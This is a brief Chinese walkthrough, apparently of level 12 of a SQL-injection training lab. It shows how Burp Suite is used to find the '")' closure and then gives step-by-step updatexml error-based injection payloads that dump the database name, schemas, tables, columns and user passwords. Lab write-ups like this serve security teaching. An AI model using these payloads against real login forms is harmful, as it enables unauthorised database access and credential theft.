一、bp开启拦截,打开十二关点击submit,bp收到拦截的报文
二、send to repeater,然后打开repeater模块
三、先输入单引号发现页面没错误,然后输入双引号发现有错误信息,可以考虑使用报错注入
四、既然双引号报错了,然后添加注释符发现还是报错,再添加一个括号,页面显示正常,则闭合方式为")
uname=1")#&passwd=&submit=Submit
五、先来判断当前数据库
uname=1") and updatexml(1,concat('^',database()),1)#&passwd=&submit=Submit
六、爆全部数据库,更改limit可逐个显示
uname=1") and updatexml(1,concat('^',(select schema_name from information_schema.schemata limit 0,1)),1)#&passwd=&submit=Submit
七、爆指定数据库所有表
uname=1") and updatexml(1,concat('^',(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1)#&passwd=&submit=Submit
八、爆指定表所有列名
uname=1") and updatexml(1,concat('^',(select column_name from information_schema.columns where table_name='users' limit 0,1)),1)#&passwd=&submit=Submit
九、爆指定列所有数据
uname=1") and updatexml(1,concat('^',(select password from users limit 0,1)),1)#&passwd=&submit=Submit
over~